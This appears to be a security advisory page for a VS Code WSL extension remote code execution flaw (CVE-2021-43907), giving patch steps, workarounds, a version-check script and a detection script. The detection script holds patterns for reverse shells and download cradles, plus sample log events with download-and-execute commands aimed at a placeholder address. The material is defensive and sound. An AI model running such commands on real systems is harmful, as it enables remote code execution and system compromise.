CVE-2021-43907: Visual Studio Code WSL Extension Remote Code Execution Vulnerability

CVSS 9.8 CRITICAL

📋 TL;DR

A vulnerability in the Visual Studio Code WSL extension allows remote code execution when a user opens a malicious workspace. It affects developers running VS Code with the WSL extension on Windows. An attacker who persuades a user to open a specially crafted workspace gains arbitrary code execution with that user's privileges.

💻 Affected Systems

Products:
  • Visual Studio Code
  • Visual Studio Code WSL Extension
Versions: WSL extension versions prior to v0.58.2
Operating Systems: Windows 10, Windows 11
Default Config Vulnerable: ⚠️ Yes
Notes: Requires WSL extension installed and enabled. Users must open a malicious workspace file to trigger exploitation.

📦 What is this software?

Visual Studio Code is Microsoft's cross-platform source-code editor. The WSL extension (extension ID ms-vscode-remote.remote-wsl) lets VS Code running on Windows use a Windows Subsystem for Linux distribution as its development environment: the editor UI stays on Windows while a VS Code Server, the integrated terminal and the workspace's tooling run inside the distribution. A workspace (a folder or a .code-workspace file) carries its own settings, which VS Code applies when the workspace is opened.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Full system compromise. The attacker executes arbitrary code as the user, steals credentials, installs malware, or pivots to other systems.

🟠 Likely Case: Code execution in the user's context, giving access to sensitive development files, source code and credentials stored on the machine.

🟢 If Mitigated: With the extension updated or disabled, a crafted workspace no longer yields code execution. Awareness training and least-privilege accounts reduce the blast radius but do not by themselves prevent exploitation on an unpatched extension.

🌐 Internet-Facing: MEDIUM - Requires user interaction (opening malicious workspace) but can be delivered via email, downloads, or compromised websites.
🏢 Internal Only: MEDIUM - Internal spear-phishing or shared malicious workspaces could exploit this within organizations.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: No (user interaction required: the victim must open the crafted workspace)
Complexity: LOW

Exploitation requires user interaction, but is technically simple once the malicious workspace is opened. Proof-of-concept code has been published.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: WSL extension v0.58.2 and later

Vendor Advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907

Restart Required: No (VS Code prompts to reload the window once the extension has updated)

Instructions:

1. Open VS Code.
2. Open the Extensions view (Ctrl+Shift+X).
3. Search for 'WSL' and select the Remote - WSL extension (ms-vscode-remote.remote-wsl).
4. Click Update if it is offered; otherwise uninstall and reinstall to get the latest version.
5. Reload the window when prompted and verify that the installed version is 0.58.2 or higher.

🔧 Temporary Workarounds

Disable WSL Extension

Platform: Windows

Temporarily disable the WSL extension until it is patched. The command below disables it only for that launch of VS Code; to keep it disabled across sessions, use the Disable action on the extension in the Extensions view.

code --disable-extension ms-vscode-remote.remote-wsl

Restrict Workspace Files

Platform: All

Only open folders and .code-workspace files from trusted sources; do not open workspaces received by email, downloaded from untrusted sites, or shared by unknown parties.

🧯 If You Can't Patch

  • Disable the WSL extension completely, via the Extensions view or the command line
  • Use application control (AppLocker or Windows Defender Application Control) to block unexpected processes launched from VS Code, keeping in mind that the integrated terminal legitimately spawns shells and wsl.exe

🔍 How to Verify

Check if Vulnerable:

Check the WSL extension version in the VS Code Extensions view. If it is below 0.58.2, the installation is vulnerable.

Check Version:

code --list-extensions --show-versions | findstr remote-wsl

The output is one line of the form ms-vscode-remote.remote-wsl@<version>. Compare the version numerically (0.58.10 is newer than 0.58.2), not as a string.

Verify Fix Applied:

Confirm WSL extension version is 0.58.2 or higher in Extensions view.
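As an added example (not code from this page or from Microsoft), the following Python script automates the version check above. It parses the listing produced by `code --list-extensions --show-versions` and compares versions component-wise as integers; the embedded sample listing is constructed, and the 0.58.2 threshold is the one given on this page. Run it on the machine to be checked; if `code` is not on PATH it reports "unknown" rather than guessing.

```python
"""Check whether the installed VS Code WSL extension predates the fixed release.

Added example for this page, not code from the original page or from
Microsoft. It parses the output of `code --list-extensions --show-versions`
(one `publisher.name@version` per line) and compares the version
component-wise as integers, so 0.58.10 is correctly ranked above 0.58.2
where a plain string comparison would not.
"""
import re
import shutil
import subprocess

EXTENSION_ID = "ms-vscode-remote.remote-wsl"
FIXED_VERSION = (0, 58, 2)  # first fixed release as stated on this page

_LINE_RE = re.compile(r"^(?P<ext>[^@\s]+)@(?P<ver>\d+(?:\.\d+)*)$")


def parse_version(text: str) -> tuple:
    """'0.58.2' -> (0, 58, 2); tuples compare component-wise, numerically."""
    return tuple(int(part) for part in text.split("."))


def find_extension_version(listing: str, ext_id: str = EXTENSION_ID):
    """Installed version of ext_id as a tuple, or None if it is not installed."""
    for line in listing.splitlines():
        m = _LINE_RE.match(line.strip())
        if m and m.group("ext").lower() == ext_id.lower():
            return parse_version(m.group("ver"))
    return None


def assess(listing: str) -> str:
    """Classify a listing as 'not-installed', 'vulnerable' or 'patched'."""
    version = find_extension_version(listing)
    if version is None:
        return "not-installed"
    return "patched" if version >= FIXED_VERSION else "vulnerable"


def assess_local_install() -> str:
    """Run the real CLI on this machine; 'unknown' if `code` is not on PATH.

    shutil.which resolves `code` to code.cmd on Windows (via PATHEXT) or to
    the shell wrapper on other platforms, so no shell is needed.
    """
    exe = shutil.which("code")
    if exe is None:
        return "unknown"
    try:
        out = subprocess.run([exe, "--list-extensions", "--show-versions"],
                             capture_output=True, text=True, check=True, timeout=60)
    except (OSError, subprocess.SubprocessError):
        return "unknown"
    return assess(out.stdout)


# Constructed sample listing (not captured from a real machine).
SAMPLE_LISTING = """ms-python.python@2021.12.1559732655
ms-vscode-remote.remote-wsl@0.58.1
eamodio.gitlens@11.7.0
"""

if __name__ == "__main__":
    print("sample listing:", assess(SAMPLE_LISTING))   # vulnerable
    print("this machine:  ", assess_local_install())
```

The extension ID is matched case-insensitively and the version is compared as a tuple of integers, which is the detail that matters once the extension passes 0.58.9.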

📡 Detection & Monitoring

Log Indicators:

  • Child processes of Code.exe that an editor would not normally launch (script hosts, mshta, regsvr32, certutil) or shells started with encoded or download-and-execute command lines
  • wsl.exe launched by Code.exe with an unusual command line; because the extension runs a VS Code Server inside the distribution, a payload may execute on the Linux side and be visible on Windows only as the wsl.exe invocation
  • Workspace files opened from mail attachments, downloads or shared locations shortly before such process activity

Network Indicators:

  • Outbound connections to suspicious domains from the VS Code process or its children
  • Unexpected download activity following a workspace open

SIEM Query:

Process creation (Sysmon Event ID 1 or Windows Security event 4688) where the parent image ends with \Code.exe and either the child image is a script host or other living-off-the-land binary, or the command line contains an encoded PowerShell command, a download cradle, or a pipe into a shell. Code.exe legitimately spawns powershell.exe, cmd.exe, git, node and wsl.exe for terminals and extensions, so key on the child's arguments rather than on the parent alone.
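As an added example (not code from this page or from Microsoft), here is the detection logic above applied to process-creation events in Python. The event format is an assumption (one dict per event using the Sysmon Event ID 1 field names), the sample events are constructed, and 203.0.113.5 is a documentation address. The patterns are a starting point to tune against your own baseline of what Code.exe spawns on developer machines.

```python
"""Flag suspicious child processes of VS Code in process-creation logs.

Added example for this page, not code from the original page or from
Microsoft. Input format is an assumption: one dict per event using the
Sysmon Event ID 1 field names UtcTime, ParentImage, Image and CommandLine
(Security event 4688 carries the same information under other names).
VS Code legitimately spawns powershell.exe, cmd.exe, git, node and wsl.exe
for terminals and extensions, so "child of Code.exe" alone is too noisy;
the rule keys on what the child is and how it is invoked.
"""
import re

# Binaries an editor has no business launching directly (living-off-the-land).
LOLBIN_CHILDREN = {
    "mshta.exe", "regsvr32.exe", "rundll32.exe", "wscript.exe",
    "cscript.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe",
}

# (label, pattern) pairs for command lines typical of a dropped payload.
SUSPICIOUS_ARGS = [
    ("powershell encoded command",
     re.compile(r"-e(?:nc|ncodedcommand|c)?\s+[A-Za-z0-9+/=]{40,}", re.I)),
    ("powershell download cradle",
     re.compile(r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|DownloadString|Net\.WebClient", re.I)),
    ("shell download cradle",
     re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba|z|da)?sh\b", re.I)),
    ("base64 decode piped to shell",
     re.compile(r"\bbase64\b.*(?:-d|--decode)\b.*\|\s*(?:ba|z|da)?sh\b", re.I)),
    ("reverse shell primitive",
     re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s|/dev/tcp/", re.I)),
]


def basename(path: str) -> str:
    """Last path component, lower-cased, accepting Windows or POSIX separators."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the reasons this event is suspicious (empty list means benign)."""
    if basename(event.get("ParentImage", "")) != "code.exe":
        return []
    reasons = []
    child = basename(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    if child in LOLBIN_CHILDREN:
        reasons.append(f"lolbin child: {child}")
    for label, pattern in SUSPICIOUS_ARGS:
        if pattern.search(cmdline):
            reasons.append(f"cmdline: {label}")
    return reasons


def scan(events: list) -> list:
    """Run classify over a batch; return alerts as (UtcTime, Image, reasons)."""
    alerts = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            alerts.append((ev.get("UtcTime"), ev.get("Image"), reasons))
    return alerts


# Constructed sample events (not real telemetry); 203.0.113.5 is a documentation address.
_CODE = r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"UtcTime": "2021-12-14 09:00:01", "ParentImage": _CODE, "Image": _PS,
     "CommandLine": "powershell.exe -NoLogo"},                      # integrated terminal: benign
    {"UtcTime": "2021-12-14 09:00:02", "ParentImage": _CODE, "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": 'wsl.exe -d Ubuntu -e bash -c "curl -s http://203.0.113.5/x.sh | bash"'},  # cradle into WSL
    {"UtcTime": "2021-12-14 09:00:03", "ParentImage": _CODE, "Image": r"C:\Program Files\Git\cmd\git.exe",
     "CommandLine": "git status"},                                  # source control: benign
    {"UtcTime": "2021-12-14 09:00:04", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/p.hta"},          # not a VS Code child: out of scope here
    {"UtcTime": "2021-12-14 09:00:05", "ParentImage": _CODE, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://203.0.113.5/p.hta"},          # lolbin child of Code.exe
    {"UtcTime": "2021-12-14 09:00:06", "ParentImage": _CODE, "Image": _PS,
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + "QQBB" * 15},  # encoded payload
]

if __name__ == "__main__":
    for when, image, reasons in scan(SAMPLE_EVENTS):
        print(when, image, "; ".join(reasons))
```

On the sample batch the benign terminal and git launches pass, the explorer-spawned mshta is ignored as out of scope for this rule, and the three remaining events are flagged for different reasons: a download cradle passed through wsl.exe, a script host started by Code.exe, and an encoded PowerShell command.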

🔗 References

  • Microsoft Security Response Center advisory: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-43907